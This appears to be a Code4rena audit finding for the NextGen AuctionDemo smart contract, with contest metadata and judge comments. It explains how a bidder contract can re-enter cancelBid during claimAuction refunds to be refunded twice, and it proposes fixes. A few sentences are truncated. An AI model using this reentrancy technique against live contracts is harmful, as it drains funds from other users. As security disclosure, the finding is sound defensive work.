Platform: Code4rena
Start Date: 30/10/2023
Pot Size: $49,250 USDC
Total HM: 14
Participants: 243
Period: 14 days
Judge: 0xsomeone
Id: 302
League: ETH
Rank: 240/243
Findings: 1
Award: $0.00
🌟 Selected for report: 0
🚀 Solo Findings: 0
🌟 Selected for report: smiling_heretic
Also found by: 00decree, 00xSEV, 0x180db, 0x3b, 0x656c68616a, 0xAadi, 0xAleko, 0xAsen, 0xDetermination, 0xJuda, 0xMAKEOUTHILL, 0xMango, 0xMosh, 0xSwahili, 0x_6a70, 0xarno, 0xgrbr, 0xpiken, 0xsagetony, 3th, 8olidity, ABA, AerialRaider, Al-Qa-qa, Arabadzhiev, AvantGard, CaeraDenoir, ChrisTina, DanielArmstrong, DarkTower, DeFiHackLabs, Deft_TT, Delvir0, Draiakoo, Eigenvectors, Fulum, Greed, HChang26, Haipls, Hama, Inference, Jiamin, JohnnyTime, Jorgect, Juntao, Kaysoft, Kose, Kow, Krace, MaNcHaSsS, Madalad, MrPotatoMagic, Neon2835, NoamYakov, Norah, Oxsadeeq, PENGUN, REKCAH, Ruhum, Shubham, Silvermist, Soul22, SovaSlava, SpicyMeatball, Talfao, TermoHash, The_Kakers, Toshii, TuringConsulting, Udsen, VAD37, Vagner, Zac, Zach_166, ZdravkoHr, _eperezok, ak1, aldarion, alexfilippov314, alexxander, amaechieth, aslanbek, ast3ros, audityourcontracts, ayden, bdmcbri, bird-flu, blutorque, bronze_pickaxe, btk, c0pp3rscr3w3r, c3phas, cartlex_, cccz, ciphermarco, circlelooper, crunch, cryptothemex, cu5t0mpeo, darksnow, degensec, dethera, devival, dimulski, droptpackets, epistkr, evmboi32, fibonacci, gumgumzum, immeas, innertia, inzinko, jasonxiale, joesan, ke1caM, kimchi, lanrebayode77, lsaudit, mahyar, max10afternoon, merlin, mrudenko, nuthan2x, oakcobalt, openwide, orion, phoenixV110, pontifex, r0ck3tz, rotcivegaf, rvierdiiev, seeques, shenwilly, sl1, slvDev, t0x1c, tallo, tnquanghuy0512, tpiliposian, trachev, twcctop, vangrim, volodya, xAriextz, xeros, xuwinnie, y4y, yobiz, zhaojie
0 USDC - $0.00
https://github.com/code-423n4/2023-10-nextgen/blob/8b518196629faa37eae39736837b24926fd3c07c/smart-contracts/AuctionDemo.sol#L104 https://github.com/code-423n4/2023-10-nextgen/blob/8b518196629faa37eae39736837b24926fd3c07c/smart-contracts/AuctionDemo.sol#L124
claimAuction function of AuctionDemo contract transfers the token to highest bidder (winner) and the bid amount is transferred to the owner. Moreover, refund is sent to all remaining participants (non-winners) of the auction via call function. However, if a non-winner is a contract, then it can invoke the cancelBid function when refund is sent to it. This way, the attacker can get the refund twice; once by the claimAuction function and secondly by cancelBid function.
claimAuction function exactly on the auction end time (i.e block.timestamp == AuctionEndTime), this causes the following condition to become true :-
require(block.timestamp >= minter.getAuctionEndTime(_tokenid)...call and the attacker invokes the cancelBid function and his bid is cancelled as following condition is also still true :-function cancelBid(uint256 _tokenid, uint256 index) public { require(block.timestamp <= minter.getAuctionEndTime(_tokenid), "Auction ended");
(bool success, ) = payable(auctionInfoData[_tokenid][index].bidder).call{value: auctionInfoData[_tokenid][index].bid}("");Same is also
Manual Review
Line 115 should change the status to false before sending refund
} else if (auctionInfoData[_tokenid][i].status == true) {
Moreover, remove equality from the condition in cancelBid function
require(block.timestamp < minter.getAuctionEndTime(_tokenid), "Auction ended");
or remove equality from the condition in claimAuction function
require(block.timestamp > minter.getAuctionEndTime(_tokenid)...
Reentrancy
#0 - c4-pre-sort
2023-11-15T00:18:41Z
141345 marked the issue as duplicate of #962
#1 - c4-judge
2023-12-04T21:43:02Z
alex-ppg marked the issue as duplicate of #1323
#2 - c4-judge
2023-12-08T17:32:11Z
alex-ppg marked the issue as partial-50
#3 - c4-judge
2023-12-08T17:33:31Z
alex-ppg marked the issue as full credit
#4 - c4-judge
2023-12-08T17:34:33Z
alex-ppg marked the issue as partial-50